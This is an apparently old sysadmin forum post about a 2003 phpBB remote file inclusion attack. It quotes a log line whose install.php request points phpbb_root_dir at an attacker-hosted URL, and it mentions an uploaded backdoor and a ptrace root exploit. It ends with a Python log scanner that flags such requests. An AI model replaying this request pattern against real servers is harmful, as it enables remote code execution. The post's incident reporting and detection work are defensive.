phpbb exploit

Probably old news, but this hit a few of our customers today. A request comes in like so:

57.66.3.199 - - [03/Jun/2003:15:28:56 -0600] "GET /phpbb/install.php?phpbb_root_dir=http://57.66.3.199/ass/ HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" www.customerwebsite.com

Shortly thereafter, two files are uploaded: bd.pl and ex.c.

One allows for shell access via a random port (55557 in our case), the other attempts to exploit a Linux ptrace local root vulnerability.

Our user accounts are chrooted and have no compiler available, so no damage done here, but you may want to look at your systems some.
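
A defender-side check for the request pattern in the log line above, added here as an example and not part of the original post: it flags access-log entries where a query parameter's value is a remote URL. The function names, regexes and the two extra log lines (documentation-range addresses) are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Combined log format; the post's sample also carries a trailing vhost field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

# First line is from the post; the other two are constructed sample lines.
SAMPLE = [
    '57.66.3.199 - - [03/Jun/2003:15:28:56 -0600] "GET /phpbb/install.php'
    '?phpbb_root_dir=http://57.66.3.199/ass/ HTTP/1.1" 200 - "-" '
    '"Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" '
    'www.customerwebsite.com',
    '192.0.2.10 - - [03/Jun/2003:15:30:01 -0600] "GET /phpbb/viewtopic.php'
    '?t=42 HTTP/1.1" 200 5120 "-" "Mozilla/4.0" www.example.com',
    '198.51.100.7 - - [03/Jun/2003:15:31:12 -0600] "GET /phpbb/install.php'
    '?phpbb_root_dir=http%3A%2F%2F203.0.113.5%2Fx%2F HTTP/1.1" 404 - "-" "-" '
    'www.example.com',
]


def _host(url):
    """Hostname of url, or None if the URL is malformed."""
    try:
        return urlsplit(url).hostname
    except ValueError:  # e.g. unterminated IPv6 literal
        return None


def find_remote_includes(lines):
    """Return one finding per query parameter whose value is a remote URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        query = m['target'].partition('?')[2]
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = unquote(value)  # second decode for double-encoded values
            if REMOTE_RE.match(value):
                findings.append({
                    'client': m['ip'], 'time': m['ts'],
                    'status': int(m['status']), 'param': name, 'value': value,
                    # In the post's log line the include host is the client.
                    'self_hosted': _host(value) == m['ip'],
                })
    return findings
```

Parameters that legitimately carry URLs (redirect targets, for instance) also match, so treat hits as leads and triage on the script name and status code.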
